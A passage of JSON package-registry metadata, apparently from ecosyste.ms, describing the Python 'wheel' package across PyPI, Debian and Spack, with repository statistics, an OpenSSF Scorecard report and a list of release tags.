0.38.1"}],"purl":"pkg:pypi/wheel"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xd21wLTJjZjItZzlnNs4AAwjr/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/wheel","docker_dependents_count":35665,"docker_downloads_count":16444477627,"usage_url":"https://repos.ecosyste.ms/usage/pypi/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-08T05:17:07.814Z","issues_count":80,"pull_requests_count":126,"avg_time_to_close_issue":15660927.105263159,"avg_time_to_close_pull_request":2263640.7603305783,"issues_closed_count":57,"pull_requests_closed_count":121,"pull_request_authors_count":29,"issue_authors_count":72,"avg_comments_per_issue":5.85,"avg_comments_per_pull_request":3.634920634920635,"merged_pull_requests_count":107,"bot_issues_count":0,"bot_pull_requests_count":52,"past_year_issues_count":24,"past_year_pull_requests_count":42,"past_year_avg_time_to_close_issue":1405819.2727272727,"past_year_avg_time_to_close_pull_request":1091646.5128205128,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":39,"past_year_pull_request_authors_count":13,"past_year_issue_authors_count":23,"past_year_avg_comments_per_issue":3.125,"past_year_avg_comments_per_pull_request":2.5238095238095237,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":18,"past_year_merged_pull_requests_count":33,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"jaraco","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"webknjaz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/webknjaz"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"}],"active_maintainers":[{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/wheel/codemeta","maintainers":[{"uuid":"agronholm","login":"agronholm","name":null,"email":null,"url":null,"packages_count":31,"html_url":"https://pypi.org/user/agronholm/","role":null,"created_at":"2022-11-21T08:37:15.696Z","updated_at":"2022-11-21T08:37:15.696Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/agronholm/packages"},{"uuid":"joeforker","login":"joeforker","name":null,"email":null,"url":null,"packages_count":33,"html_url":"https://pypi.org/user/joeforker/","role":null,"created_at":"2022-11-21T08:37:15.706Z","updated_at":"2022-11-21T08:37:15.706Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/joeforker/packages"},{"uuid":"natefoo","login":"natefoo","name":null,"email":null,"url":null,"packages_count":16,"html_url":"https://pypi.org/user/natefoo/","role":null,"created_at":"2022-11-21T08:37:15.713Z","updated_at":"2022-11-21T08:37:15.713Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/natefoo/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890072,"maintainers_count":381228,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":13676419,"name":"wheel","ecosystem":"debian","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T15:59:55.788Z","latest_release_published_at":"2026-02-12T15:59:55.788Z","latest_release_number":"0.46.1-2","last_synced_at":"2026-03-12T19:10:23.264Z","created_at":"2026-02-12T15:59:55.619Z","updated_at":"2026-03-12T19:10:23.265Z","registry_url":"https://tracker.debian.org/pkg/wheel","install_command":"apt-get install wheel","documentation_url":"https://packages.debian.org/trixie/wheel","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.7.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python (\u003e= 6), flit, pybuild-plugin-pyproject, python3-all-dev, python3-packaging (\u003e= 24) \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-setuptools (\u003e= 77) \u003c!nocheck\u003e, python3-sphinx \u003c!nodoc\u003e, tox (\u003e= 4) \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-12T15:59:56.618Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/wheel?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/wheel/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1987,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":316},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-06-10T05:17:04.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":76552,"name":"py-wheel","ecosystem":"spack","description":"A built-package format for Python.\n","homepage":"https://github.com/pypa/wheel","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":null,"versions_count":12,"first_release_published_at":"2022-04-05T09:30:11.584Z","latest_release_published_at":"2023-10-10T23:45:57.127Z","latest_release_number":"0.41.2","last_synced_at":"2026-04-01T03:01:40.217Z","created_at":"2022-04-05T09:30:11.554Z","updated_at":"2026-04-01T03:01:40.217Z","registry_url":"https://packages.spack.io/package.html?name=py-wheel","install_command":"spack install py-wheel","documentation_url":null,"metadata":{},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed